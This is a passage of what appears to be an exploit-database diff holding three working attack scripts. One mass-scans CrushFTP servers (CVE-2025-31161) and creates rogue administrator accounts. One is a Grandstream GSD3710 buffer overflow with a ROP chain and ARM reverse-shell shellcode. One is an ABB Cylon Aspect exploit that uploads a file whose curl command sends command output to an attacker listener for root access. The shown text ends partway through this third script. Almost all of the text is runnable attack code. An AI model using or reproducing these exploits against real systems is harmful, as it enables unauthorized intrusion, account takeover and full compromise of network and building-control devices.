"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
"Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
"Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/49.0.1015.193 Mobile Safari/600.9"
]
# Banner
BANNER = fr"""
{Fore.CYAN}
/ ____/______ _______/ /_ / ____/ /_____
/ / / ___/ / / / ___/ __ \/ /_ / __/ __ \
/ /___/ / / /_/ (__ ) / / / __/ / /_/ /_/ /
\____/_/ \__,_/____/_/ /_/_/ \__/ .___/
/_/
{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
{Style.RESET_ALL}
"""
# Setup logging
def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
"""Configure logging based on specified level and output file."""
numeric_level = getattr(logging, log_level.upper(), None)
if not isinstance(numeric_level, int):
raise ValueError(f"Invalid log level: {log_level}")
log_format = "%(asctime)s - %(levelname)s - %(message)s"
handlers = []
if log_file:
handlers.append(logging.FileHandler(log_file))
handlers.append(logging.StreamHandler())
logging.basicConfig(
level=numeric_level,
format=log_format,
handlers=handlers
)
class TargetManager:
"""Manages target hosts and related operations."""
def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
self.targets = []
self.vulnerable_targets = []
self.exploited_targets = []
if target_file:
self.load_targets_from_file(target_file)
elif single_target:
self.add_target(single_target)
def load_targets_from_file(self, filename: str) -> None:
"""Load targets from a file."""
try:
with open(filename, "r") as f:
self.targets = [line.strip() for line in f if line.strip()]
if not self.targets:
logging.warning(f"Target file '{filename}' is empty or contains only whitespace.")
else:
logging.info(f"Loaded {len(self.targets)} targets from {filename}")
except FileNotFoundError:
logging.error(f"Target file '{filename}' not found.")
sys.exit(1)
except Exception as e:
logging.error(f"Error loading targets: {e}")
sys.exit(1)
def add_target(self, target: str) -> None:
"""Add a single target."""
if target not in self.targets:
self.targets.append(target)
def mark_as_vulnerable(self, target: str) -> None:
"""Mark a target as vulnerable."""
if target not in self.vulnerable_targets:
self.vulnerable_targets.append(target)
def mark_as_exploited(self, target: str) -> None:
"""Mark a target as successfully exploited."""
if target not in self.exploited_targets:
self.exploited_targets.append(target)
def save_results(self, output_file: str, format_type: str = "txt") -> None:
"""Save scan results to a file."""
try:
if format_type.lower() == "json":
results = {
"scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"total_targets": len(self.targets),
"vulnerable_targets": self.vulnerable_targets,
"exploited_targets": self.exploited_targets
}
with open(output_file, "w") as f:
json.dump(results, f, indent=4)
elif format_type.lower() == "csv":
with open(output_file, "w") as f:
f.write("target,vulnerable,exploited\n")
for target in self.targets:
vulnerable = "Yes" if target in self.vulnerable_targets else "No"
exploited = "Yes" if target in self.exploited_targets else "No"
f.write(f"{target},{vulnerable},{exploited}\n")
else: # Default to txt
with open(output_file, "w") as f:
f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
f.write(f"Total Targets: {len(self.targets)}\n")
f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n")
f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n")
f.write("Vulnerable Targets:\n")
for target in self.vulnerable_targets:
f.write(f"- {target}\n")
f.write("\nExploited Targets:\n")
for target in self.exploited_targets:
f.write(f"- {target}\n")
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Error saving results: {e}")
class ExploitEngine:
"""Core engine for vulnerability checking and exploitation."""
def __init__(self, target_manager: TargetManager, config: Dict):
self.target_manager = target_manager
self.config = config
self.session = self._create_session()
def _create_session(self) -> requests.Session:
"""Create and configure a requests session."""
session = requests.Session()
session.verify = False
# Set proxy if configured
if self.config.get("proxy"):
session.proxies = {
"http": self.config["proxy"],
"https": self.config["proxy"]
}
# Set custom headers
session.headers.update({
"User-Agent": random.choice(USER_AGENTS),
"Connection": "close",
})
return session
def check_vulnerability(self, target_host: str) -> bool:
"""Check if target is vulnerable to CVE-2025-31161."""
port = self.config.get("port", 443)
timeout = self.config.get("timeout", 10)
headers = {
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
}
# Add custom headers if provided
if self.config.get("custom_headers"):
headers.update(self.config["custom_headers"])
try:
protocol = "https" if port == 443 else "http"
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
response = self.session.get(
url,
headers=headers,
timeout=timeout
)
if response.status_code == 200:
# Additional validation
if self.config.get("deep_check", False):
# Look for specific patterns in the response that confirm vulnerability
if "CrushFTP" in response.text or "WebInterface" in response.text:
self.target_manager.mark_as_vulnerable(target_host)
if self.config.get("verbose", False):
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
return True
else:
if self.config.get("verbose", False):
console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
return False
else:
# Simple check based on status code
self.target_manager.mark_as_vulnerable(target_host)
if self.config.get("verbose", False):
console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
return True
else:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
return False
except requests.exceptions.ConnectionError:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Connection error")
except requests.exceptions.Timeout:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Connection timeout")
except requests.exceptions.RequestException as e:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Request error: {e}")
except Exception as e:
if self.config.get("verbose", False):
console.print(f"[red][-][/red] {target_host} - Error: {e}")
return False
def exploit(self, target_host: str) -> bool:
"""Exploit the vulnerability on the target host."""
port = self.config.get("port", 443)
timeout = self.config.get("timeout", 10)
target_user = self.config.get("target_user", "crushadmin")
new_user = self.config.get("new_user")
password = self.config.get("password")
if not new_user or not password:
logging.error("New user and password are required for exploitation")
return False
headers = {
"Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
"Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
"Connection": "close",
}
# Add custom headers if provided
if self.config.get("custom_headers"):
headers.update(self.config["custom_headers"])
# Generate a timestamp for the created_time field
timestamp = int(time.time() * 1000)
# Build the payload with more comprehensive user permissions
payload = {
"command": "setUserItem",
"data_action": "replace",
"serverGroup": "MainUsers",
"username": new_user,
"user": f'''<?xml version="1.0" encoding="UTF-8"?>
<user type="properties">
<user_name>{new_user}</user_name>
<password>{password}</password>
<extra_vfs type="vector"></extra_vfs>
<version>1.0</version>
<root_dir>/</root_dir>
<userVersion>6</userVersion>
<max_logins>0</max_logins>
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
<created_by_username>{target_user}</created_by_username>
<created_by_email></created_by_email>
<created_time>{timestamp}</created_time>
<password_history></password_history>
<admin>true</admin>
</user>''',
"xmlItem": "user",
"vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
"permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
"c2f": "31If"
}
try:
protocol = "https" if port == 443 else "http"
url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
response = self.session.post(
url,
headers=headers,
data=payload,
timeout=timeout
)
if response.status_code == 200:
# Verify the user was actually created
if self.config.get("verify_exploit", True):
if self._verify_user_created(target_host, new_user):
self.target_manager.mark_as_exploited(target_host)
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
return True
else:
console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
return False
else:
self.target_manager.mark_as_exploited(target_host)
console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
return True
else:
console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
return False
except Exception as e:
console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
return False
def _verify_user_created(self, target_host: str, username: str) -> bool:
"""Verify that the user was successfully created."""
# This is a placeholder for actual verification logic
# In a real implementation, you would check if the user exists
# For now, we'll just return True
return True
def scan_targets(self) -> None:
"""Scan all targets for vulnerability."""
targets = self.target_manager.targets
threads = self.config.get("threads", 10)
if not targets:
logging.error("No targets specified")
return
console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TextColumn("({task.completed}/{task.total})"),
TimeRemainingColumn(),
console=console
) as progress:
task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
for future in concurrent.futures.as_completed(future_to_target):
progress.update(task, advance=1)
# Display results
vulnerable_count = len(self.target_manager.vulnerable_targets)
console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
if vulnerable_count > 0 and self.config.get("verbose", False):
console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
for target in self.target_manager.vulnerable_targets:
console.print(f"[green]→[/green] {target}")
def exploit_targets(self) -> None:
"""Exploit vulnerable targets."""
targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
threads = self.config.get("threads", 5) # Use fewer threads for exploitation
if not targets:
logging.error("No targets to exploit")
return
console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
TextColumn("({task.completed}/{task.total})"),
TimeRemainingColumn(),
console=console
) as progress:
task = progress.add_task("[red]Exploiting targets...", total=len(targets))
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
future_to_target = {executor.submit(self.exploit, target): target for target in targets}
for future in concurrent.futures.as_completed(future_to_target):
progress.update(task, advance=1)
# Display results
exploited_count = len(self.target_manager.exploited_targets)
console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
if exploited_count > 0:
console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
for target in self.target_manager.exploited_targets:
console.print(f"[green]→[/green] {target}")
def parse_arguments() -> argparse.Namespace:
"""Parse command line arguments."""
parser = argparse.ArgumentParser(
description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check a single target for vulnerability
python cve_2025_31161.py --target example.com --check
# Exploit a vulnerable target
python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
# Scan multiple targets from a file
python cve_2025_31161.py --file targets.txt --check --threads 20
# Scan and automatically exploit vulnerable targets
python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
# Export results to JSON format
python cve_2025_31161.py --file targets.txt --check --output results.json --format json
"""
)
# Target specification
target_group = parser.add_argument_group("Target Specification")
target_group.add_argument("--target", help="Single target host to scan/exploit")
target_group.add_argument("--file", help="File containing list of targets (one per line)")
target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
# Actions
action_group = parser.add_argument_group("Actions")
action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
# Exploitation options
exploit_group = parser.add_argument_group("Exploitation Options")
exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
exploit_group.add_argument("--password", help="Password for the new admin account")
exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
# Scan options
scan_group = parser.add_argument_group("Scan Options")
scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
# Output options
output_group = parser.add_argument_group("Output Options")
output_group.add_argument("--output", help="Output file for results")
output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
output_group.add_argument("--log-file", help="Log file to write to")
output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
# Advanced options
advanced_group = parser.add_argument_group("Advanced Options")
advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
return parser.parse_args()
def validate_args(args: argparse.Namespace) -> bool:
"""Validate command line arguments."""
# Check if at least one target specification is provided
if not args.target and not args.file:
logging.error("No target specified. Use --target or --file")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
print(f" python {sys.argv[0]} --file example_targets.txt --check")
return False
# Check if at least one action is specified
if not args.check and not args.exploit:
logging.error("No action specified. Use --check or --exploit")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
print(f" python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
return False
# If exploit action is specified, check for required parameters
if args.exploit and (not args.new_user or not args.password):
logging.error("Exploitation requires --new-user and --password")
print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
return False
return True
def main() -> None:
"""Main function."""
# Parse command line arguments
args = parse_arguments()
# Configure logging
log_level = "error" if args.quiet else args.log_level
setup_logging(log_level, args.log_file)
# Display banner
if not args.quiet:
console.print(BANNER)
# Validate arguments
if not validate_args(args):
sys.exit(1)
# Create target manager
target_manager = TargetManager(args.file, args.target)
# Build configuration dictionary
config = {
"port": args.port,
"threads": args.threads,
"timeout": args.timeout,
"verbose": args.verbose,
"deep_check": args.deep_check,
"target_user": args.target_user,
"new_user": args.new_user,
"password": args.password,
"only_vulnerable": args.only_vulnerable,
"verify_exploit": args.verify_exploit,
"proxy": args.proxy,
}
# Add custom headers if provided
if args.custom_headers:
try:
config["custom_headers"] = json.loads(args.custom_headers)
except json.JSONDecodeError:
logging.error("Invalid JSON format for custom headers")
sys.exit(1)
# Add custom user agent if provided
if args.user_agent:
config["user_agent"] = args.user_agent
# Create exploit engine
engine = ExploitEngine(target_manager, config)
# Perform actions
if args.check:
engine.scan_targets()
if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
engine.exploit_targets()
# Save results if output file is specified
if args.output:
target_manager.save_results(args.output, args.format)
# Display summary
if not args.quiet:
console.print("\n[bold green]Summary:[/bold green]")
console.print(f"Total targets: {len(target_manager.targets)}")
console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
console.print("\n[bold red]Operation cancelled by user[/bold red]")
sys.exit(0)
except Exception as e:
logging.error(f"Unhandled exception: {e}")
sys.exit(1)

247
exploits/multiple/remote/52303.py Executable file
View file

@ -0,0 +1,247 @@
#!/usr/bin/env python3
# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow
# Google Dork: [if applicable]
# Date: 2025-05-23
# Exploit Author: Pepelux (user in ExploitDB)
# Vendor Homepage: https://www.grandstream.com/
# Software Link: [download link if available]
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2070
"""
Author: Jose Luis Verdeguer (@pepeluxx)
Required: Pwntools
Example:
Terminal 1:
$ ncat -lnvp 4444
Terminal 2:
$ python 3 CVE-2020-2070.py -ti DEVICE_IP -tp 8081 -ri LOCAL_IP -rp 4444
"""
from operator import ge
import sys
import time
from pwn import *
import argparse
def get_args():
parser = argparse.ArgumentParser(
formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
prog, max_help_position=50))
# Add arguments
parser.add_argument('-ti', '--target_ip', type=str, required=True,
help='device IP address', dest="device_ip")
parser.add_argument('-tp', '--target_port', type=int, required=True, default=8081,
help='device port', dest="device_port")
parser.add_argument('-ri', '--reverse_ip', type=str, required=True,
help='reverse IP address', dest="reverse_ip")
parser.add_argument('-rp', '--reverse_port', type=int, required=True,
help='reverse port', dest="reverse_port")
# Array for all arguments passed to script
args = parser.parse_args()
try:
TI = args.device_ip
TP = args.device_port
RI = args.reverse_ip
RP = args.reverse_port
return TI, TP, RI, RP
except ValueError:
exit()
def check_badchars(data):
for i in range(len(data)):
if data[i] in [0x0, 0x40]:
log.warn("Badchar %s detected at %#x" % (hex(data[i]), i))
return True
return False
def get_shellcode(ip, port):
ip_bytes = socket.inet_aton(ip)
port_bytes = struct.pack(">H", port)
# Linux ARM reverse shell
# switch to thumb mode
sc = b"\x01\x30\x8F\xE2" # add r3, pc, #1
sc += b"\x13\xFF\x2F\xE1" # bx r3
# socket(2, 1, 0)
sc += b"\x02\x20" # movs r0, #2
sc += b"\x01\x21" # movs r1, #1
sc += b"\x92\x1A" # subs r2, r2, r2
sc += b"\xC8\x27" # movs r7, #0xc8
sc += b"\x51\x37" # adds r7, #0x51
sc += b"\x01\xDF" # svc #1
sc += b"\x04\x1C" # adds r4, r0, #0
# connect(r0, &sockaddr, 16)
sc += b"\x0C\xA1" # adr r1, #0x30
sc += b"\x4A\x70" # strb r2, [r1, #1]
sc += b"\x10\x22" # movs r2, #0x10
sc += b"\x02\x37" # adds r7, #2
sc += b"\x01\xDF" # svc #1
# dup2(sockfd, 0)
sc += b"\x3F\x27" # movs r7, #0x3f
sc += b"\x20\x1C" # adds r0, r4, #0
sc += b"\x49\x1A" # subs r1, r1, r1
sc += b"\x01\xDF" # svc #1
# dup2(sockfd, 1)
sc += b"\x20\x1C" # adds r0, r4, #0
sc += b"\x01\x21" # movs r1, #1
sc += b"\x01\xDF" # svc #1
# dup2(sockfd, 2)
sc += b"\x20\x1C" # adds r0, r4, #0
sc += b"\x02\x21" # movs r1, #2
sc += b"\x01\xDF" # svc #1
# execve("/bin/sh")
sc += b"\x06\xA0" # adr r0, #0x18
sc += b"\x92\x1A" # subs r2, r2, r2
sc += b"\x49\x1A" # subs r1, r1, r1
sc += b"\x01\x91" # str r1, [sp, #4]
sc += b"\x02\x91" # str r1, [sp, #8]
sc += b"\x01\x90" # str r0, [sp, #4]
sc += b"\x01\xA9" # add r1, sp, #4
sc += b"\xC2\x71" # strb r2, [r0, #7]
sc += b"\x0B\x27" # movs r7, #0xb
sc += b"\x01\xDF" # svc #1
sc += b"\x02\xFF"
sc += port_bytes
sc += ip_bytes
sc += b"/bin/shX"
return sc
def main():
ti, tp, ri, rp = get_args()
# ROP Gadgets
libc_base = 0x76ec1000
mprotect = libc_base + 0x93510+1
pop_lr = libc_base + 0x1848C # pop {r0, r4, r8, ip, lr, pc}
pop_pc = libc_base + 0xd7515 # pop {pc}
pop_r0 = libc_base + 0x00064bb0+1 # 0x00064bb0 : pop {r0, pc}
pop_r5 = libc_base + 0x00003738+1 # 0x00003738 : pop {r5, pc}
add_r1_sp = libc_base + 0x000b3c4e+1 # 0x000b3c4e : add r1, sp, #0x14 ; blx r5
# 0x0002f83c (0x0002f83d): mov r0, r1; bx lr
mov_r0_r1 = libc_base + 0x0002f83d
# 0x0006a086 (0x0006a087): pop {r1, pc}
pop_r1 = libc_base + 0x6a087
ands_r0_r1 = libc_base + 0x1feba+1 # 0x0001feba : ands r0, r1 ; bx lr
# 0x000a3a42 : movs r4, r0 ; pop {r1, pc}
mov_r4_r0 = libc_base + 0x000a3a42+1
# 0x0001fdae (0x0001fdaf): movs r1, r0; bx lr
movs_r1_r0 = libc_base + 0x0001fdaf
and_r0_f = libc_base + 0x8717e+1 # 0x0008717e : and r0, r0, #0xf ; bx lr
movs_r2_r0 = libc_base + 0x0001fc6a+1 # 0x0001fc6a : movs r2, r0 ; bx lr
mov_r0_r4 = libc_base + 0x0001f9d4+1 # 0x0001f9d4 : movs r0, r4 ; bx lr
blx_sp = libc_base + 0x46595 # 0x00046594 (0x00046595): blx sp
shellcode = get_shellcode(ri, rp)
auth_command = b"LOG/1.0 END CMD:AUTH_USERNAME @"
junk = p32(0x43434343)
payload = auth_command
payload += b"A" * 144
# The goal is that R0 -> SP
# R5 = pop {pc}
# because in the the next gadget we have a blx r5
payload += p32(pop_r5)
payload += p32(pop_pc) # R5 = pop {pc}
# R1 = SP ; BLX pop {pc}
payload += p32(add_r1_sp) # add r1, sp, #0x14 ; blx r5
# Restore LR register (because it has been updated by the last BLX gadget)
payload += p32(pop_lr) # pop {r0, r4, r8, ip, lr, pc}
payload += junk*4 # r0, r4, r8, ip
payload += p32(pop_pc) # LR = pop {pc}
# R0 = stack address
payload += p32(mov_r0_r1) # mov r0, r1; bx lr
# R1 = mask page align
payload += p32(pop_r1) # pop {r1, pc}
payload += p32(0xfffe1001)
# R0 = stack address & 0xfffe1001
payload += p32(ands_r0_r1) # ands r0, r1 ; bx lr
# R4 = R0
payload += p32(mov_r4_r0) # movs r0, r4 ; bx lr
payload += junk # r1
# mprotect params
# r0 = shellcode page aligned address
# r1 = size(ofshellcode)
# r2 = protection (0x7 RWX)
# R2 = 0x7
payload += p32(pop_r0)
payload += p32(0x07070707)
payload += p32(and_r0_f) # R0 = 7 (RWX)
payload += p32(movs_r2_r0) # R2 (prot: 7 - RWX)
# R1 = length = 0x10101010 (avoid 0's)
payload += p32(pop_r0)
payload += p32(0x01010101)
payload += p32(movs_r1_r0) # r1 (length: 0x10101010)
# R0 = stack address 4k aligned
payload += p32(mov_r0_r4)
# mprotect(stack, 0x10101010, 0x7)
payload += p32(mprotect)
payload += p32(blx_sp) # ejecutamos en pila
payload += shellcode # shellcode
if check_badchars(payload[len(auth_command):]):
sys.exit(0)
log.info("Device IP: %s:%d" % (ti, tp))
log.info("Attacker IP: %s:%d" % (ri, rp))
log.info("Payload len: %d" % len(payload))
count = 1
while True:
try:
print('Try: %d' % count)
r = remote(ti, tp)
r.send(payload)
log.success("Payload sent!")
# r.close()
time.sleep(1)
count += 1
except:
sleep(3)
pass
if __name__ == '__main__':
main()

281
exploits/multiple/remote/52305.py Executable file
View file

@ -0,0 +1,281 @@
#!/usr/bin/env python
#
#
# Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation
#
#
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
# Firmware: <=3.08.03
#
# Summary: ASPECT is an award-winning scalable building energy management
# and control solution designed to allow users seamless access to their
# building data through standard building protocols including smart devices.
#
# Desc: The ABB BMS/BAS controller is vulnerable to code execution and sudo
# misconfiguration flaws. An authenticated remote code execution vulnerability
# in the firmware update mechanism allows an attacker with valid credentials to
# escalate privileges and execute commands as root. The process involves uploading
# a crafted .bsx file through projectUpdateBSXFileProcess.php, which is then moved
# to htmlroot and executed by projectUpdateBSXExecute.php. This script leverages
# sudo to run the uploaded bsx file, enabling the attacker to bypass input validation
# checks and execute arbitrary code, leading to full system compromise and unauthorized
# root access.
#
# ---------------------------------------------------------------------------------
#
# $ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest
# [o] Exploit starting at 21.05.2025 12:33:47
# [o] Using credentials: guest:*****
# [o] Auth successfull.
# [o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688
# [o] Listening on 192.168.73.9:5555...
# [o] Building name: ["Tower 3"]
# [o] runtime.ver=v3.08.03
# [+] -> [virtual] rootshell
#
# # id
# uid=0(root) gid=0(root) groups=0(root)
# # pwd
# /home/MIX_CMIX/htmlroot
# exit
# [o] Removing callback file.
# [!] Connection terminated.
#
# ---------------------------------------------------------------------------------
#
#
# Tested on: GNU/Linux 3.15.10 (armv7l)
# GNU/Linux 3.10.0 (x86_64)
# GNU/Linux 2.6.32 (x86_64)
# Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
# Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
# PHP/7.3.11
# PHP/5.6.30
# PHP/5.4.16
# PHP/4.4.8
# PHP/5.3.3
# AspectFT Automation Application Server
# lighttpd/1.4.32
# lighttpd/1.4.18
# Apache/2.2.15 (CentOS)
# OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
# OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5947
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php
#
#
# 21.04.2024
#
#
from colorama import init, Fore
from urllib.parse import quote
from time import sleep
import threading
import datetime
import requests
import socket
import re
import os
import sys
init()
def safe(*trigger, ):
return True
def auth(target_ip, user, pwd):
login_ep = f"http://{target_ip}/validate/login.php"
payload = {
'f_user' : user, # 'aamuser, guest'
'f_pass' : pwd, # 'default, guest'
'submit' : 'Login'
}
sess = requests.Session()
r = sess.post(login_ep, data=payload)
if r.status_code == 200 and 'PHPSESSID' in sess.cookies:
print("[o] Auth successfull.")
phpsessid = sess.cookies.get('PHPSESSID')
print("[o] PHPSESSID:", phpsessid)
return sess.cookies
else:
print("[!] Auth failed.")
return None
def kacuj(target_ip, listen_ip, cmd, token=None, cookies=None):
agentwho = "NetRanger/84.19"
payload = f"curl -A \"`{cmd}`\" {listen_ip}:5555"
url = f"http://{target_ip}/projectUpdateBSXFileProcess.php"
headers = {
"Content-Type": "multipart/form-data; boundary=----zeroscience",
"User-Agent": agentwho
}
data = (
"------zeroscience\r\n"
f"Content-Disposition: form-data; name=\"userfile\"; filename={AAM}\r\n"
"Content-Type: application/octet-stream\r\n\r\n"
f"{payload}\r\n"
'------zeroscience--\r\n'
)
try:
r = requests.post(url, headers=headers, data=data, cookies=cookies)
if r.status_code == 200:
url_execute = f"http://{target_ip}/projectUpdateBSXExecute.php?file={AAM}"
r = requests.get(url_execute, cookies=cookies)
return r.content
except requests.exceptions.RequestException as e:
print(f"[!] Error sending payload: {e}")
return None
def koj_slusha(listen_ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", 5555))
s.listen(1)
print(f"[o] Listening on {listen_ip}:5555...")
while True:
conn, addr = s.accept()
try:
data = conn.recv(9999)
if not data:
print("[!] Connection closed by remote host.")
break
dd = data.decode("utf-8", errors="ignore")
uam = re.search(r"User-Agent:\s*(.*)\s*Host:", dd, re.DOTALL)
if uam:
print(uam.group(1), end="")
else:
print
#print(f"[o] Full response:\n{dd}")
except Exception as e:
print(f"[!] Error while receiving data: {e}")
finally:
conn.close()
def main():
if safe(True):
print("\nSafety: \033[92mON\033[0m")
exit(-17)
else:
next
global AAM
global start
AAM = "firmware.bsx"
start = datetime.datetime.now()
start = start.strftime("%d.%m.%Y %H:%M:%S")
title = "\033[96mABB Cylon® ASPECT® Supervisory Building Control v3.08.03\033[0m"
subtl = "\033[95m\t\t-> Remote Root Exploit <-\033[0m"
prj = f"""
P R O J E C T\033[90m
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
\033[0m
{title}
{subtl}
"""
if len(sys.argv) < 4:
print(prj)
print("./bsxroot.py <targetIP> <listenIP> <PHPSESSID / --creds user:pass>")
sys.exit(-0)
target_ip = sys.argv[1]
listen_ip = sys.argv[2]
auth_arg = sys.argv[3]
print("[o] Exploit starting at", start)
if "--creds" in sys.argv:
creds_index = sys.argv.index("--creds") + 1
if creds_index >= len(sys.argv):
print("[!] Error: Missing credentials after --creds.")
sys.exit(-1)
user_pass = sys.argv[creds_index]
if ":" not in user_pass:
print("[!] Error: Invalid credentials format. Expected format: user:pass.")
sys.exit(-2)
user, pwd = user_pass.split(":")
print(f"[o] Using credentials: {user}:{'*' * len(pwd)}")
cookies = auth(target_ip, user, pwd)
else:
